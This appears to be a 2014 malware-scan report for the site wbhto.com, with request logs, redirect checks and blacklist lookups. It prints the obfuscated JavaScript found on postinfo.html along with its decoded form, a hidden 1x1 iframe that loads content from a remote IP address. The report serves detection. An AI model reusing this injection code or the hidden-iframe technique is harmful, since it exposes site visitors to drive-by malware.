Scanned pages/files
Request | Server response | Status |
http://wbhto.com/ | 200 OK Content-Length: 425 Content-Type: text/html | clean |
http://wbhto.com/cgi-bin/ | 403 Forbidden Content-Length: 464 Content-Type: text/html | clean |
http://wbhto.com/test404page.js | 404 Not Found Content-Length: 466 Content-Type: text/html | clean |
http://wbhto.com/images/ | 200 OK Content-Length: 346 Content-Type: text/html | clean |
http://wbhto.com/postinfo.html | 200 OK Content-Length: 3101 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-227-226-58-216-221-57-::-214-216-74-86-227-212-226-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); Decoded script: <iframe src="http://91.142.64.91/ts/in.cgi?Ktes" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wbhto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:18:58 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_bwlimited/1.4 PHP/5.2.9
Content-Length: 425
Content-Type: text/html;charset=ISO-8859-1
...425 bytes of data.
GET / HTTP/1.1
Host: wbhto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:18:58 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_bwlimited/1.4 PHP/5.2.9
Content-Length: 425
Content-Type: text/html;charset=ISO-8859-1
...425 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wbhto.com
Referer: http://www.google.com/search?q=wbhto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wbhto.com
Referer: http://www.google.com/search?q=wbhto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wbhto.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wbhto.com/
Result: wbhto.com is not infected or malware details are not published yet.
Result: wbhto.com is not infected or malware details are not published yet.